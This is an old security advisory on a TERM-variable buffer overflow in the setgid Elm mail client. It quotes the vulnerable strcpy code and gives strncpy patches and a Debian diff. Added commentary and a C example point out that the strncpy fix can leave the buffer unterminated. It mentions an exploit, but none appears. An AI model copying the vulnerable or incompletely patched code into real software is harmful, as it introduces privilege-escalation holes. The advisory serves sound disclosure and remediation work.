COMMAND

    Elm

SYSTEMS AFFECTED

    Linux

PROBLEM

    Wojciech Swieboda found an overflow vulnerability in Elm (Elm is
    setgid mail on Linux, and perhaps on some other platforms as well).
    This was tested on versions 2.3 and 2.4, on 3 different Linux
    installations and ELM-ME+.

    John   Goerzen   has   confirmed   that   the    recently-reported
    vulnerability in Elm is also  present in Elm-ME+ and thus  also in
    Debian  GNU/Linux  version  1.2,   prerelease  version  1.3,   and
    development tree "unstable".

    Lame exploit for linux included below (works from time to time):


SOLUTION

    From Elm 2.3's curses.c:

    [...]
        char termname[40];
        char *strcpy(), *getenv();

        if (getenv("TERM") == NULL) return(-1);

        if (strcpy(termname, getenv("TERM")) == NULL)
                return(-1);
    [...]

    To patch, change the strcpy line to

        if (strncpy(termname, getenv("TERM"), sizeof(termname)) == NULL)

    To patch it on Elm 2.4, change:

    [...]
        if (strcpy(termname, termenv) == NULL)
                return (-1);

    to:

    [...]
        if (strncpy(termname, termenv, sizeof(termname)) == NULL)
                return (-1);
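    As an added illustration (not Elm's code or the advisory's), the C
    program below contrasts the advisory's strncpy fix with a variant that
    rejects over-long values: strncpy bounded by sizeof(termname) stops the
    overflow, but when TERM is 40 or more characters it fills the buffer
    without a terminating NUL. The LONG_TERM value and the helper names are
    constructed for this example.

```c
#include <stdio.h>
#include <string.h>

/* Buffer size from the advisory's curses.c: char termname[40]. */
#define TERMNAME_LEN 40

/* A constructed 60-character TERM value, longer than termname. */
static const char LONG_TERM[] =
    "xterm-xterm-xterm-xterm-xterm-xterm-xterm-xterm-xterm-xterm-";

/* The advisory's patch in isolation: strncpy bounded by the full buffer
 * size.  No overflow, but when termenv has TERMNAME_LEN or more
 * characters strncpy fills the buffer and writes no terminating NUL.
 * Returns 1 if a NUL is present afterwards, 0 if not. */
int strncpy_copy_is_terminated(const char *termenv)
{
    char termname[TERMNAME_LEN];
    strncpy(termname, termenv, sizeof(termname));
    return memchr(termname, '\0', sizeof(termname)) != NULL;
}

/* Hardened variant (added here, not Elm's code): refuse a TERM value that
 * does not fit together with its NUL, keeping the original return(-1)
 * convention, and otherwise copy it including the terminator.
 * Returns 0 on success, -1 on rejection. */
int copy_term_checked(char *termname, size_t size, const char *termenv)
{
    size_t n;
    if (termenv == NULL) return -1;
    n = strlen(termenv);
    if (n >= size) return -1;          /* would truncate or overflow */
    memcpy(termname, termenv, n + 1);  /* n + 1 includes the NUL */
    return 0;
}

/* Convenience wrapper using a stack buffer of the original size. */
int checked_copy_result(const char *termenv)
{
    char termname[TERMNAME_LEN];
    return copy_term_checked(termname, sizeof(termname), termenv);
}

int main(void)
{
    printf("strncpy, \"vt100\": terminated=%d\n", strncpy_copy_is_terminated("vt100"));
    printf("strncpy, 60-char TERM: terminated=%d\n", strncpy_copy_is_terminated(LONG_TERM));
    printf("checked, \"vt100\": %d\n", checked_copy_result("vt100"));
    printf("checked, 60-char TERM: %d\n", checked_copy_result(LONG_TERM));
    return 0;
}
```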

    Debian GNU/Linux  1.2.x uses  stock Elm  2.4pl25.   Users of  that
    version  of  Elm  should  upgrade  to  Elm-ME+  as detailed below.
    Debian 1.3 (currently in prerelease) will come with Elm-ME+.   You
    should upgrade to the latest Elm-ME+.

    You can download the binary package immediately from:

        ftp://happy.cs.twsu.edu/pub/Debian/binaries/elm-me+_2.4pl25ME+31-5_i386.deb

    Updated source  packages and  diffs are  under /pub/Debian/sources
    on the same server.

    John Goerzen has released the updated package to Debian's master
    server, and it should show up in distributions shortly.

    --- elm-me+-2.4pl25ME+31.orig/src/curses.c
    +++ elm-me+-2.4pl25ME+31/src/curses.c
    @@ -131,7 +131,7 @@

            if ((termenv = getenv("TERM")) == NULL) return(-1);

    -       if (strcpy(termname, termenv) == NULL)
    +       if (strncpy(termname, termenv, sizeof(termname)) == NULL)
                    return(-1);

            if ((err = tgetent(_terminal, termname)) != 1)
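    Review bot: the strncpy line in this hunk removes the overflow but does
    not guarantee termination: when termenv is sizeof(termname) or more
    characters long, strncpy fills every byte of termname without a trailing
    NUL, and the following tgetent(_terminal, termname) may then read past
    the buffer. Also, strncpy returns its first argument and never NULL, so
    the `== NULL` check can never fail. Consider rejecting a TERM value whose
    strlen is >= sizeof(termname) with the existing return(-1), or copying
    sizeof(termname) - 1 bytes and setting termname[sizeof(termname) - 1] =
    '\0'.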

    Fix for Elm 2.4ME+ PL32 (25) available via:

        http://www.ozone.FMI.FI/KEH/elm-2.4ME+32.tar.gz
        http://www.ozone.FMI.FI/KEH/elm-2.4ME+PL32.patch.gz